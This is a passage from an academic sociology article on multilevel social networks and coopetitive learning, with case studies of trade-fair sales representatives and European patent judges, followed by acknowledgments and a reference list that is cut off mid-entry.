Favre and Josiane Chatellet) 3For a neo-structural economic sociology based on the relational work of entrepreneurs using coopetition to navigate social process in markets, see Lazega and Mounier (2003) and Brailly et al. (2018). 68 Embarked on social processes in dynamic and multilevel networks show that it is worth network analyzing in detail how deals for the medium- and small-sized companies are initiated and designed by their respective sales representatives at the trade fair, then later trans- formed into contracts by the companies at the inter-organizational level (Bathelt and Glückler, 2011; Berends et al., 2011). Fieldwork carried out in one such trade fair shows, for example, that the smaller players survive using multilevel, coopetitive strategies that are not entirely dissimilar to the strategies of the scientists cited above. Work at inter-individual level is based on personalized and cooperative advice networks (even between sales representatives working for competing companies), whereas work at inter-organizational level is based on competitive contracting networks. Brailly (2016) has shown how the Little Fish survive through coopetitive relational strategies at their inter-individual level. Survival from collective learning with coopetitors is based on sharing information at inter-individual level (this shows with triadic closure in ties among sellers) morphing into six-order multilevel, multisided, multiplex sub- structures including individuals and organizations, on the buying and selling sides. In this case of distribution of television programs, the networks reveal different structures and involve different mechanisms of tie formation. But this case also exposes a new dimension of agency in the survival strategies of the little fish, who think multilevel, mobilize multilevel status, and synchronize the different temporalities of the levels in their navigation of the process of coopetitive learning. This specific multilevel management of temporalities is thus another case in point of complementarity between levels. Synchronized schedules and time scales (Brailly, 2016) characterize the superposed temporalities of this multilevel system: A short term “See you next time this year” (at different trade fairs) temporality for individuals shows that the more individuals have recently participated in the same events, the more they exchange information with each other. Longer term “See you same time next year” (at this same trade fair) temporality for organizations shows that the more organizations participate in the long run in the same events, the more they deal with each other. In this multilevel structure, complementarity and synchronization are both necessary for performance, especially for the survival of smaller sellers (after oligopolistic predatory strategies undermined the market). Thus, creating international socio-organizational ties in the context of a globalized markets requires a complex multilevel process that involves and synchronizes both companies and their employees. The structures of different levels strongly influence each other and are interdependent. Reframing the embeddedness paradigm with AMN seems to be a fruitful approach to understand the globalization of markets. Organizational and individual levels are both important in different, complementary and synchronized temporalities in this system. The long- term deal network between companies influences cooperation ties between individuals, which in return can bring new business opportunities and constraints to their companies. These dynamics are likely to be recursive, combining short term and long term temporalities and processes (Quintane et al., 2013). Also, although this sharing of leftover crumbs allows smaller players to survive, this is also the story of how big business produces a global cultural order. These coopetitive collective learning processes are at the core of the joint production of global cultural homogenization. Multilevel agency in institutionalization processes This multilevel approach to organized collective agency is equivalent to a form of contextualization of networks, behavior and social processes. It has also led back to a basic sociological insight predating network analyses. Just like micro, meso- and macro-levels of society, levels in the decomposition of networks (from dyads to morphology) cannot be linked purely mechanically. Levels of collective agency are linked by the strategic efforts of actors to structure the context of their actions and interactions at all levels, including at the macro level of society. Therefore we have argued that the contextualization of networks cannot be construed without a theory of politics. In fact identification and interpretation of multilevel relational infrastructures is intrinsic to politics. This can be shown, for example, with institutionalization processes, where actors as institutional entrepreneurs participate in normative controversies to structure the contexts of their interactions and thus to manage, for example, their cooperation dilemmas. What we call a neo-structural institutionalism explores how multilevel structure, culture and agency come together as different dimensions of these politics. This multilevel contextualization of networks and behavior has stressed overlooked structural dimensions in the structural study of politics, social change and innovation, for example by stressing the role of status inconsistencies, of collegial oligarchies, of the rhetoric of sacrifice in the management of losers, etc. (Lazega, 2001, 2018). More generally, in a Whitian spirit, further analyses can focus on organized mobility and relational turnover (OMRT) as determinants of the 69 CONNECTIONS social processes that can be modeled with multilevel social network analyses. Such phenomena also help contextualize social networks. Therefore, our third example addresses this issue directly by studying collective learning and coopetition among institutional entrepreneurs. The latter are European judges participating in a form of elitist “social movement” lobbying to create a European transnational court to institutionalize a European-level intellectual property regime, especially for patents. These judges got involved in this political process of institution building because they saw it as their duty as citizens to participate in the construction of a new European-level legal regime for intellectual property, after politicians and governments tried and failed to do so. For other examples of such discreet regulators, especially in finance and the judiciary, (see Huault et al., 2012; Lazega and Mounier, 2012). Indeed, European governments had created a European patent in 1973, but had failed to create the transnational court that would enforce this legal instrument by relying on a common interpretation of this European patent. The judges thought that this failure weakened Europe’s capacity to innovate. It allowed large transnational companies and entire industries with patents at the core of their business model (such as the pharmaceutical and biotech industry, the semiconductors’ and digital industries, etc.) to instrumentalize the courts, engage in forum shopping (i.e. selecting the national courts and judges most favorable to their preferred outcome, case by case), and use long-lasting “zombie” patents. Powerful organizations, such as a (non-EU) public/ private agency, the European Patent Office (EPO), supported this specialized and elitist social movement. This institution awards patents to business – but is also sole regulator of this system in the absence of the transnational Court. It operates with/under international private law, not EU law. A professional association, the European Patent Lawyers Association as well as a high- level official in the Brussels administration (who later became responsible for the legal department at EPO) were also involved. Judges, lawyers and members of EPO assembled at the so-called Venice Forum (VF) where we collected network data in 2009 – in addition to data on perceptions, opinions and normative choices. We measured several social networks of these judges: discussion, reading decisions made by colleagues across borders, citation of decisions made by colleagues across borders in one’s own decisions; and finally recognition of European colleagues considered to be ex ante leaders personifying the future European Uniform position on patents. The latter were expected to become members of the Court of Appeals of this jurisdiction, generating substantive interpretation of patent law and jurisprudence on which European judges would eventually align. Note that this collegial oligarchy of judges, who called themselves a “conclave,” did not include representatives of civil society associations challenging patents as the right way to encourage innovation – raising the issue of “democratic deficit” of such institutionalization processes. This collegial oligarchy of institutional entrepreneurs who were also cross-level actors succeeded in pushing to the creation in 2013 of the European Unified Patent Court (UPC), a new type of judicial institution still waiting for ratifications by key European national parliaments. This VF social movement also informally selected and lifted the collegial oligarchy of super-central judges in inter-individual networks who acquired the high multilevel status that they needed to work convincingly (from the perspective of their peers) on harmonizing the common legal interpretation of the European patent: clarifying anticipations, freezing expectations, obtaining alignments on cross-level linchpins. These supercentral players are identified in Figure 7 mapping the Uniform network among them. They were the most eminent among the judges in this “patent conclave,” thus expected to sit on the future Court of Appeal of the UPC once it would become operational. As cross-level linchpins, they had enough multilevel status and the right kind of rhetoric as judicial entrepreneurs to wield influence in this transnational institution building process. Here we see similar complementarities, but also conflicts, between levels: indeed in the European judicial architecture, the national judge is always the first level European judge, and national judges assembled in Venice were active in their national courts at various levels (from local first level to field-level regulated by Supreme courts). Thus, in this case, the national judges at the VF were also multistatus, vertical linchpins who punch above their weight in collective agency, especially in regulatory, institutionalization processes (Lazega, 2001). These actors with heterogeneous, high and inconsistent forms of status (i.e. in situations of conflicts of interests) were also thinking multilevel, with relation- ships between levels tense and contradictory, each country having historically developed its own patent law, within its own national innovation system, national legal culture and democratic division of powers. In particular, this example emphasizes the soci- alizing dimension of coopetitive learning, i.e. the fact that this process generates both epistemic and normative alignments. Drawing on collective learning among themselves, they were getting to know their foreign colleagues and the ways in which they “construe the claims” of litigating parties in their 70 Embarked on social processes in dynamic and multilevel networks respective jurisdictions. Based on this knowledge, these judges tried to hammer out a “harmonized” legal interpretation of the European Patent – although they ended up producing a common, procedural “weak culture” (in Breiger’s sense), to start creating alignments and a process of convergence and “harmonization” at the European level (Lazega, 2012a; Lazega et al., 2017). Note that high multilevel status of super-central judges in collective learning is not transformed into political capital purely mechanically. Table 1 shows an ERG model of this Uniform network, in which Figure 7: The tip of a multilevel institutional iceberg: a collegial oligarchy of institutional entrepreneurs as vertical linchpins involved in coopetitive learning and selection of its ex ante leaders. Network map of a EU “patent conclave”, the collegial oligarchy crafting the “European Compromise”. Mapping the ‘Uniform’ network: “Who expects whom to represent the future Uniform position, if any?”. Clarifying anticipations, freezing expectations, obtaining alignments on cross-level linchpins/collegial oligarchy: Multistatus German, UK and Dutch judges: Judges with * are super-central judges. (See “Learning from lobbying”, Utrecht Law Review, 2013) Table 1. Winners and losers from heterogeneous types of capitalism in the Europe des Juges institutionalization process. Level 1: Judges Level 2: Capitalism block (See ‘Collegial Oligarchies in Transnational Institution Building’, with Eric Quintane and Sandrine Casenaz, Social Networks , 2016) 71 CONNECTIONS these “activist” judges who get involved in politics, who share the same rules, and who produce a new private/public transnational institution, do not necessarily look up to the same normative ex ante leaders. Belonging to countries characterized by the same kind of capitalism and broadly defined legal culture have no direct effect, on their own, on selecting these normative ex ante leaders. However, the interaction effects of both variables help understand the construction of this collegial oligarchy and the need for observing and testing cross-level dependencies over time. These judges as vertical linchpin institutional entrepreneurs discreetly involved in politics were trying to promote a new private/ public transnational institution (the European UPC) and to put the issue on the political agenda of the European Commission. Understanding their agency requires thinking in terms of dynamics of multilevel networks. Whether this political process produces a new Europe des Juges (Dehousse, 1999) remains to be seen. Multispin: contextualizing social processes and dynamics of multilevel networks As suggested by Table 1, the macro level and the meso level contexts jointly matter for coopetitive learning and for the selection of rules to make judicial decisions. The socio-economic and political context needed to catalyze such multilevel network dynamics is no less complex than these dynamics themselves. For example, it provides and sorts personnel (Tilly, 2003), helps select leaders and facilitate their circulation, excludes dissenters, mixes members of different social niches, creates moments of synchronization between the dynamics of several levels influencing each other. In Figure 8, we represent this context as a multilevel spinning top, or “multispin,” a rough metaphor of stability from movement (Lazega et al., 2011; Lazega, 2016b, 2017) and of synchronization in these multilevel network dynamics. In this system judges are becoming increasingly central over time as they move across hierarchical levels. They rotate and move across jobs, which creates intense relational turnover. This combined OMRT can create upward mobility for vertical linchpins (but also downward mobility for others). In turn, mobility helps create the specific multipositionaly-with-status-inconsistency that is associated with institutionalization of new norms, i.e. participation in institutional change. In this multispin as a (rather rigid) metaphor of the context facilitating the institutionalization of new norms at the transnational level, the network dynamics of selection of ex ante leaders in this collegial oligarchy indicate processes at superposed levels that co-evolve, influence each other and lead to, or undermine, synchronization. This gives us insights into the production of cross-level linchpins but also of the dynamics that push and pull them across levels. Notice the stairs in the shaft of the multilevel spinning top, representing upward mobility of vertical linchpins associated with institutionalization of new norms, but also the fact that there are losers in these dynamics of multilevel networks of institutionalization. For the latter, multilevel networks lead to nowhere. The dynamics of bottom up collegiality promoting cross- level vertical linchpins can also demote them. Relative structural stability regardless of membership turnover was identified in judges’ advice networks and coopetitive learning using stochastic blockmodeling and Siena models (Lazega et al., 2011; Lazega et al., 2006), exposing a cyclical centralization− decentralization−recentralization of advice networks as stabilization provided by this multispin. This was confirmed at the inter-organizational level by Brailly et al. (2016) in the study of the global trade fair in which clusters of sales representatives participating in the market were unstable over time while clusters of the companies and organizations in which these persons were affiliated were more stable. Indeed high turnover at the interindividual level and the stability of the structure at the interorganizational level could Figure 8: Context as multispin providing stability from movement in multilevel relational infrastructures. Multispin (multilevel spinning top) as direct context of multilevel networks, driving the organized mobility and relational turnover of their members (individuals, organizations, governments). (See ‘Organized Mobility and Relational Turnover as Context for Social Mechanisms , in J.Glückler, E.Lazega & I.Hammer (Eds), Knowledge and Networks, 2017) Level of Inter-governmental network Staircase for vertical linchpins Level of inter-organizational network Level of Inter-individual network 72 Embarked on social processes in dynamic and multilevel networks be hypothesized to co-generate each other, often by dumping synchronization costs on individuals (Lazega, 2016a). The dynamics of cross-level linchpins becoming increasingly central over time and moving across hierarchical levels to institutionalize new norms across borders, these dynamics show how such multistatus and cross-level actors steer the multilevel structures that help communities navigate obstacles in key social processes. Note that multispin as a metaphor also reminds us that there are many examples of such promotion and navigation processes that exclude political opponents by just making the cost of synchronization between levels too high for them. OMRT as determinants of social processes can help filter, close, solidarize, lift and ratchet up a collegial oligarchy at the top. Again, the more open at the bottom, the more closed at the top. These promotions can often squander the social capital of the collective. The norms and institutions that they promote may not be considered legitimate if their assumed followers do not participate in their formulation, selection and promotion. Dynamic multilevel networks to explore politics in the organizational society In conclusion, the reason social processes can be navigated by relational infrastructures is that these relational infrastructures impose a form of social discipline that shapes the course on these social processes as capital of the collective. Acknowledging superposed levels of collective agency and analyzing them separately and jointly focuses the attention on multilevel relational infrastructures that help revisit vertical and horizontal differentiations in society. For example, individuals active at two levels simultaneously, i.e. vertical linchpins with multilevel and inconsistent dimensions of status who punch above their weight in the political process. Or multilevel social niches, i.e. combinations of roles played by members of a block of individuals at one level and the roles of a block of organizations at the other level, given affiliation ties. As seen with coopetition, processes at each level influence each other across levels, coevolve and can synchronize – although this synchronization cannot be taken for granted or assumed to be equally costly for all actors across levels. Dynamics of multilevel networks is a mindbogglingly complex set of phenomena with many components moving at the same time: different kinds of actors, behaviors, interactions, relationships, attributes such as positions and affiliations, relational infrastructures, social processes, encompassing global contexts creating mobility and inequalities. The three case studies of coopetition in science (multilevel networks of researchers), in business (multilevel networks of sales representatives), and in government (multilevel networks of transnational judges as institutional entrepreneurs) help us explore aspects of this temporal multilevel social order and the implications of this approach for social network analysts today. Analyses of relational infrastructures of coopetitive learning in science show that individuals and organizations are equally, but differently, important for creating and sharing new knowledge with key multilevel players. Observation of multilevel relational infrastructures of coopetitive learning in business shows that synchronized temporalities of individuals and organizations are key to the building of a new global cultural order using markets. Tracking multilevel relational infrastructures in lobbying shows that the construction of institutions also requires what we called “stability from movement,” this time in coopetitive learning, i.e. intense OMRT as context for these multilevel relational infrastructures and, with this mobility and turnover, diverse levels of access to law – indeed in many cases too much access to law. Witnessing success in the deployment of such social processes, we can be led to believe that organizations are more important than individuals. This is only true when our measurements are static; over time, individuals and their personalized relationships matter just as much, with increasing intensity of conflicts and power plays being managed with new cohorts relying on complementarity and synchronization of levels. We are just beginning to explore these dynamics of multilevel relational infrastructures in collective agency, a field of research for the future. As sug- gested by our last illustration, a better knowledge of navigation of social processes with the dynamics of multilevel networks in the organizational society helps to better understand politics and contemporary transitions, especially institutional change in the face of depleted common pool ecological resources (Bodin, 2017) and increasing social inequalities. For example, multilevel relational infrastructures and multilevel network models of navigation of social processes can measure the extent to which democracies have become elitist and unequal, and focus on how powerful elites will behave in the coming transitions. In the context of an organizational and class society, relational data is not data like any other. It can increasingly help Big Relational Tech (BRT), i.e. relational data hegemons, identify, coopt or undermine the vertical linchpins and collegial oligarchies that dominate collective learning and 73 CONNECTIONS institutionalization processes in society. Social net- works touch deep and we are becoming increasingly transparent to such organizations. The concentration of power that big relational data represents because of its increasing value as indicator of social processes and their multilevel navigation has yet to be understood and to sink in. Then, if power must check power, who will check these hegemons (Al-Amoudi and Lazega, 2019)? At least three implications follow from such questions for our academic research. First, the social construction of multilevel extensions of opportunity structures through dual alters is not just decisive for individual destinies; it is also important in the collective, political construction of the micro− meso−macro links. There are no mechanical transitions from the individual, to the dyad, to the triad, etc. until one reaches the collective with its morphological, horizontal and vertical differentiations and structures, such as multidimensional status and division of work. There is no such a mechanical transition without levels in a stratigraphy, and without multilevel strategies, including these selective extensions, in fact without millions of such extensions. These extensions and their consequences are not studied yet in spite of their obvious political importance, for example, in regulatory processes. It will be up to neo-structural sociology to show how they are created, and a special attention could be paid, for example, to how dual alters participate in anyone’s engagement in citizenship and political institutionalization of any new normal. Second, evolution of multilevel relational infrastructures and social change drive each other in the organizational society, which is a class society where organizations are “tools with a life of their own” evolving in “dynamic constitutive fields” (Selznick, 1949). In the navigation of social processes, multi- level relational infrastructures can create collegial oligarchies and democratic deficits. From “big fish in the big pond” to “cross-level linchpins” to “institutional entrepreneurs,” this often leads to rebuilding ins- titutions and societies through very discreet, techno- cratic, social and institutional engineering (such as finding/recommending/assigning the “right” alters and dual alters for any task). It is therefore part of our responsibility as social scientists to keep identifying these multilevel relational infrastructures and the elites’ ways of managing/navigating the social processes that our societies are made of: solidarities, controls, regulations and learning. For any controversial issue, in all domains, small private collegial oligarchies pop up, selected privately through sifting and lifting by multispins in every field. One of the latest was by a BRT company to decide what is fake news, what is angry mood manipulation, and how to deal with them. The more we know about dynamics of multilevel networks as public scientists, the more we will be able to contribute to managing the roller coasters of these social processes in which we are embarked. Therefore we need new richer data structures, more powerful network statistics to tests hypotheses on dynamic, multilevel networks. Third, one implication of neo-structural research is that we need to keep collecting and criticizing our own social network datasets combining structure, culture and agency (Archer, 1982; Reynaud, 1989; Breiger, 1990, 2010; Favereau and Lazega, 2002; Grossetti, 2011; Lazega, 2012b), and to develop network literacy along with thorough organizational, ethnographical and qualitative analyses. We should not give up designing our own research on the ground, collecting our own small and multilevel datasets, listening to how people themselves make sense of their actions, relationships, contexts, controversies, etc. If we do not measure and model these processes ourselves, only BRT will, and we will no longer be able to understand these processes in the original language. We can keep learning with our small datasets, especially when big relational data is not accessible to scientists in decent conditions. This is the only way to keep the knowledge of social processes public and democratic. A hidden competition is under way between public social sciences and private social sciences to track these realities. Following two generations of “governance,” collegial oligarchies of top-down collegiality emerge in many social niches making political decisions without saying so, privately de- signing changes in public institutions, not just in governments and government-related committees. Public social scientists and social network analysts should not let this disappear from the sight of the wider public. Much remains to be done to be useful in that respect. Acknowledgments In addition to my special gratitude to Lise Mounier for many years of research collaboration, I would like to thank co-authors and coworkers in social and organizational network analyses: Avner Bar- Hen, Pierre Barbillon, Germain Barré, Franck Bessis, Dominique Bouthinon, Julien Brailly, Ulrik Brandes, Ronald Breiger, Maria-Giuseppina Bruna, Saint-Clair Chabert-Liddell, Josiane Chatellet, Catherine Comet, Claude Compagnone, Bernard Conein, Sébastien Delarre, Sophie Donnet, Fabien Eloire, Ana Maria Falconi, Olivier Favereau, Guillaume Favre, Alexis Ferrand, Johannes Glückler, Karima Guenfoud, 74 Embarked on social processes in dynamic and multilevel networks Ingmar Hammer, Isabelle Huault, Marie Jourda, David Krackhardt, David Lazega, Marie-Odile Lebeaux, Claire Lemercier, Jaime Montes, Mohamed Oubenal, Philippa Pattison, Elise Penalva Icher, Álvaro Piña- Stranger, Christophe Prieur, Eric Quintane, Chrystelle Richard, Garry Robins, Juliette Rouchier, Guillaume Santini, Saraï Sapulete, Silvio Salej Higgins, Tom Snijders, Henry Soldano, Rafael Stofer, Mark Tranmer, Paola Tubaro, Marijtje Van Duijn, Marta Varanda, Stéphane Vari, Peng Wang, Olivier Wattebled, Harrison White and Aleš Žiberna. I would also like to thank Julien Brailly, Saint-Clair Chabert-Liddell, Maud Gellée, Alexis Gomes Matias, Jordan Laires, Jade Limacher, Yannis Rabia, David Schoch and François Tang for their work on exploring visualizations of multilevel networks. References Agneessens, F. and Wittek, R. 2012. Where do intra-organizational advice relations come from? The role of informal status and social capital in social exchange. Social Networks 34: 333–345. Al-Amoudi, I. and Lazega, E. (Eds) 2019. Confronting the Matrix: Post-Human Institutions and Organizations, Routledge, London. Archer, M. S. 1982. Morphogenesis versus structuration: on combining structure and action. British Journal of Sociology 35: 455–583. Barbillon, P., Donnet, S., Lazega, E. and Bar- Hen, A. 2016. Stochastic block-models for multiplex networks: an application to a multilevel network of researchers. Journal of the Royal Statistical Society: Series A (Statistics in Society) 180: 295–314. Bathelt, H. and Glückler, J. 2011. The Relational Economy: Geographies of Knowing and Learning, Oxford University Press, Oxford. Berends, H., Van Burg, E. and van Raaij, E. M. 2011. Contacts and contracts: cross-level network dynamics in the development of an aircraft material. Organization Science 22: 940–960. Bernard, J., Dausset, J. with the collaboration of A. Hess. 2000. La Mosaique Humaine. Entretien sur les Révolutions de la Médecine et le Devenir de l’Homme, Calmann-Levy, Paris. Bodin, Ö. 2017. Collaborative environmental governance: achieving collective action in social- ecological systems. Science 357: 6352, p.eaan1114. Brailly, J. 2016. Dynamics of multi-level networks in trade fairs – a local approach to the cooperation among competitors. Journal of Economic Geography 16: 1279–1301. Brailly, J., Favre, G., Chatellet, J. and Lazega, E. 2016. Embeddedness as a multilevel problem: a case study in economic sociology. Social Networks 44: 319–333. Brailly, J., Comet, C., Delarre, S., Eloire, F., Favre, G., Lazega, E., Mounier, L., Montes-Lihn, J., Oubenal, M., Penalva-Icher, E., Piña-Stranger, Á. and Varanda, M. 2018. Neo-structural economic sociology beyond embeddedness: relational infrastructures and social processes in markets and market institutions. Economic Sociology: The European Electronic Newsletter 19: 36– 49. Breiger, R. L. 1974. The duality of persons and groups. Social Forces 53: 181–190. Breiger, R. L. (Ed.) 1990. Social Mobility and Social Structure, Cambridge University Press, Cambridge. Breiger, R. L. 2010. Dualities of culture and structure: Seeing through cultural holes. In Fuhse, J. and Mützel, S. (Eds), Relationale Soziologie: Zur kulturellen Wende der Netzwerkforschung, Springer Verlag, Wiesbaden, pp. 37–47. Burt, R. S. 2005. Brokerage and Closure. An Introduction to Social Capital Oxford University Press, Oxford. Burt, R. S. and Merluzzi, J. 2014. “Embedded brokerage: hubs versus locals”, In Brass, D. J., Labianca, G. (Joe), Mehra, A., Halgin, D. S. and Borgatti, Stephen P. (Eds), Research in the Sociology of Organizations, Emerald Group Publishing Limited, pp. 161–177. Coleman, J. S. 1982. The Asymmetric Society, Syracuse University Press, Syracuse, NY. Coromina Soler, L., Coenders, G., Ferligoj, A. and Guia, J. 2011. PhD students’ research group social capital in two countries: a clustering approach with duocentred network measures. Metodološki Zvezki 8: 137–155. Dehousse, R. 1999. L’Europe par le droit. Critique internationale 2: 133–150. Eloire, F. 2010. Une approche sociologique de la concurrence sur un marché Le cas.des restaurateurs lillois. Revue Française de Sociologie, 51(3): 481–517. Eloire, F., Elise Penalva-Icher et E. Lazega 2011. “Les réseaux complets en questions: Apports et limites de l’analyse des réseaux sociaux en milieu interorganisationnel”, Terrains & Travaux, 19: 77–98. Fararo, T. J. and Doreian, P. 1984. Tripartite structural analysis: generalizing the Breiger-Wilson formalism. Social Networks 6: 141–175. Favereau, O. and Lazega, E. (Eds) 2002. Conventions and Structures in Economic Organization: Markets, Networks, and Hierarchies, Edward Elgar Publishing, Cheltenham. Favre, G., Brailly, J., Chatellet, J. and Lazega, E. 2016. Inter-organizational network influence on long- term and short-term inter-individual relationships: The case of a trade fair for TV programs distribution in sub-Saharan Africa. In Lazega, E. and Snijders, T. A. B. (Eds), Multi-level Network Analysis for the Social Sciences, Springer, Cham, pp. 295–314. Glückler, J., Lazega, E. and Hammer, I. (Eds) 2017. Knowledge and Networks, Vol. 11 Springer, Cham. 75 CONNECTIONS Grossetti, M. 2011. L’espace à trois dimensions des phénomènes sociaux. Echelles d’action et d’analyse. SociologieS, available at: http://sociologies.revues.org/ index3466.html Huault, I., Lazega, E. and Richard, Ch. 2012. Introduction: the discreet regulator. In Huault, I. and Richard, C. H. (Eds), Finance: The Discreet Regulator, Palgrave Macmillan, London, pp. 1–16. Koskinen, J., Broccatelli, C., Wang, P. and Robins, G. 2017. Bayesian analysis of ERG models for multilevel, multiplex, and multilayered networks with sampled or missing data. In Petrucci, A., Racioppi, F. and Verde, R. (Eds), Convegno della Società Italiana di Statistica, Springer, Cham, pp. 105–117. Krackhardt, D. 1990. Assessing the political landscape: structure, cognition, and power in organizations. Admi- nistrative Science Quarterly 35: 342–369. Lazega, E. 1994. Analyse de réseaux et sociologie des organisations. Revue Française de Sociologie 35: 293–320. Lazega, E. 2001. The Collegial Phenomenon: The So- cial Mechanisms of Cooperation Among Peers in a Cor- porate Law Partnership, Oxford University Press, Oxford. Lazega, E. 2012a. Learning from lobbying: mapping judicial dialogue across national borders among European intellectual property judges. Utrecht Law Review, 8(2): 115–128. Lazega, E. 2012b. Sociologie néo-structurale. In Keucheyan et, R. and Bronner, G. (Eds), Introduction à la théorie sociale contemporaine Presses Universitaires de France, Paris, pp. 113–129. Lazega, E. 2014. Appropriateness and structure in organizations: secondary socialization through dynamics of advice networks and weak culture. In Brass, D. J., Labianca, G. (Joe), Mehra, A., Halgin, D. S. and Borgatti, Stephen P. (Eds), Volume on Contemporary Perspectives on Organizational Social Networks, Research in the Sociology of Organizations, Emerald, Somerville, MA, pp. 377–398. Lazega, E. 2016a. Synchronization costs in the organizational society: intermediary relational infrastructures in the dynamics of multilevel networks. In Lazega, E. and Snijders, T. (Eds), Multilevel Network Analysis for the Social Sciences: Theory, Methods and Applications, Springer, Dordrecht, pp. 47–77. Lazega, E. 2016b. Joint ‘anormative’ regulation from status inconsistency: a multilevel spinning top model of specialized institutionalization. In Archer, M. S. (Ed.), Anormative Regulation in the Morphogenic Society, Springer, Cham, pp. 169–190. Lazega, E. 2017. Organized mobility and relational turnover as context for social mechanisms: a dynamic invariant at the heart of stability from movement. In Glückler, J., Lazega, E. and Hammer, I. (Eds), Knowledge and Networks, Springer, Cham, pp. 119–142. Lazega, E. 2018. Networks and institutionalization: a neo-structural approach. Connections 37: 7–22. Lazega, E. 2020. Bureaucracy, Collegiality and Social Change: Redefining Organizations with Multilevel Relational Infrastructures, Edward Elgar Publishers, Cheltenham. Lazega, E. and Mounier, L. 2003. Interlocking judges: On joint (exogenous and self) governance of markets. Research in the Sociology of Organizations, 20: 267–295. Lazega, E. and Mounier, L. 2012. Networks of institutional capture. In Vedres, B. and Scotti, M. (Eds), Networks in Social Policy Problems, Cambridge University Press, Cambridge, pp. 124–137. Lazega, E. and Snijders, T. A. B. (Eds) 2016. Multilevel Network Analysis for the Social Sciences: Theory, Methods and Applications, Springer, Dordrecht. Lazega, E., Lemercier, C. and Mounier, L. 2006. A spinning top model of formal structure and informal behaviour: dynamics of advice networks in a commercial court. European Management Review 3: 113–122. Lazega, E., Sapulete, S. and Mounier, L. 2011. Structural stability regardless of membership turnover? The added value of blockmodelling in the analysis of network evolution. Quality & Quantity 45: 129–144. Lazega, E., Jourda, M.-Th, Mounier, L. and Stofer, R. 2008. Catching up with the big fish in the big pond? Multi-level network analysis through linked design. Social Networks 30: 157–176. Lazega, E. and Jourda, M.-Th. 2016. The structural wings of Matthew effects: the contribution of three-level network data to the analysis of cumulative advantage. Methodological Innovation 9: 1–13. Lazega, E., Jourda, M.-Th. and Mounier, L. 2013. Network lift from dual alters: extended opportunity structures from a multilevel and structural perspective. European Sociological Review 29: 1226–1238. Lazega, E., Bar-Hen, A., Barbillon, P. and Donnet, S. 2016. Effects of competition on collective learning in advice networks. Social Networks 47: 1–14. Lazega, E., Quintane, E. and Casenaz, S. 2017. Collegial oligarchy and networks of normative align- ments in transnational institution building. Social Networks, 48: 10–22. Lindenberg, S. 1997. Grounding groups in theory: functional, cognitive, and structural interdepedencies. In Markovsky, B. Lovaglia, M. J. and Troyer, L. (Eds), Advances in Group Processes, 14, JAI Press, Greenwich, CT, pp. 281–331. Oubenal, M. 2015. La Légitimation des produits financiers, Editions EMS, Paris. Parcel, T. L., Kaufman, R.L. and Leeann, J. 1991. Going up the ladder: multiplicity sampling to create linked macro-to-micro organizational samples. In Marsden, P. (Ed.), Sociological Methodology, Basil Blackwell, Oxford, pp. 43–79. Pattison, P. and Wasserman, S. 1999. Logit models and logistic regressions for social networks: II. Multivariate relations. British Journal of Mathematical and Statistical Psychology 52: 169–193. 76 Embarked on social processes in dynamic and multilevel networks Penalva-Icher, É. 2010. Amitié et régulation par les normes. Revue française de sociologie 51: 519–544. Perrow, C. 1991. A society of organizations. Theory and Society 20: 725–762. Pina-Stranger, A. and Lazega, E. 2011. Bringing personalized ties back in: Their added value for Biotech entrepreneurs and venture capitalists in inter- organizational networks. The Sociological Quarterly, 52: 268–292. Presthus, R. 1962. The Organizational Society, Knopf, New York, NY. Quintane, E., Pattison, P. E., Robins, G. L. and Mol, J. M. 2013. Short-and long-term stability in organizational networks: temporal structures of project teams. Social Networks 35: 528–540. Reynaud, J. -D. 1989. Les Règles du jeu: L’action collective et la régulation sociale, Armand Colin, Paris. Selznick, P. H. 1949. TVA and the Grass Roots: A Study in the Sociology of Formal Organizations, University of California Press, Berkeley, CA. Selznick, P. H. 1957. Leadership in Administration, Row, Peterson & Co, Evanston, IL. Snijders, T. A. B. 1996. Stochastic actor-oriented models for network change. Journal of Mathematical Sociology 21: 149–172. Snijders, T. A. B. 2005. Models for longitudinal network data. Chapter 11. In Carrington, P., Scott, J. and Wasserman, S. (Eds), Models and Methods in Social Network Analysis, Cambridge University Press, New York, NY, pp. 215–247. Snijders, T. A. B. 2016. The multiple flavours of multilevel issues for networks. In Lazega, E. and Snijders, T. A. B. (Eds), Multilevel Network Analysis: Theory, Methods and Applications, Springer, Cham, pp. 15–46. Snijders, T. A. B. and Bosker, R. J. 2012. Multilevel Analysis: An Introduction to Basic and Advanced Multilevel Modeling, 2nd ed., Sage Publishers, London. Snijders, T. A. B. and Steglich, C. E. G. (forthcoming). Social Network Dynamics by Examples, Cambridge University Press, Cambridge. Snijders, T. A. B., Pattison, P. E., Robins, G. L. and Handcock, M. S. 2006. New specifications for exponential random graph models. Sociological Methodology 36: 99–153. Tilly, C. H. 1998. Durable Inequality, University of California Press, Berkeley, CA. Tilly, C. H. 2003. Changing forms of inequality. Sociological Theory 21: 31–36. Tranmer, M., Pallotti, F. and Lomi, A. 2016. The embeddedness of organizational performance: multiple membership multiple classification models for the analysis of multilevel networks. Social Networks 44: 269–280. Van Duijn, M. A., Snijders, T. A. and Zijlstra, B. J. 2004. p2: a random effects model with covariates for directed graphs. Statistica Neerlandica 58: 234–254. Wang, P., Robins, G., Pattison, P. and Lazega, E. 2013. Exponential random graph models for multilevel networks. Social Networks, 35: 96–115. Wang, P., Robins, G., Pattison, P. and Lazega, E. 2016. Social selection models for multilevel networks. Social Networks, 44: 346–362. Wasserman, S. and Iacobucci, D. 1991. Statistical modelling of one-mode and two-mode networks: simultaneous analysis of graphs and bipartite graphs. British Journal of Mathematical and Statistical Psychology 44: 13–43. Wasserman, S. and Robins, G. 2005. An introduction to random graphs, dependence graphs, and p*. Models and Methods in Social Network Analysis 27: 148–161. Weber, M. 1978. Economy and Society, edited by G. Roth and C. Wittich, University of California Press, Berkeley, (first edition 1920). White, H. C. 1970. Chains of Opportunity: System Models of Mobility in Organizations, Harvard University Press, Cambridge. White, H. C., Boorman, S. C. and Breiger, R. L. 1976. Social structure from multiple networks. I. Blockmodels of roles and positions. American Journal of Sociology 81: 730–780. Wittek, R. 2017. Intra-organizational networks. In Alhajj, R. and Rokne, J. (Eds), Encyclopedia of Social Network Analysis and Mining, 2nd ed., Springer, New York, NY. Wittek, R. and Van de Bunt, G. G. 2004. Post- bureaucratic governance, informal networks and oppositional solidarity in organizations. The Netherlands’ Journal of Social Sciences 40: 295–319. Wittek, R. and van Witteloostuijn, V. 2013. Rational choice and organizational change. In Wittek, R., Snijders, T. A. and Nee, V. (Eds), The Handbook of Rational Choice Social Research, Stanford University Press, Palo Alto, CA, pp. 556–558. Zappa, P. and Lomi, A. 2015. The analysis of multilevel networks in organizations: 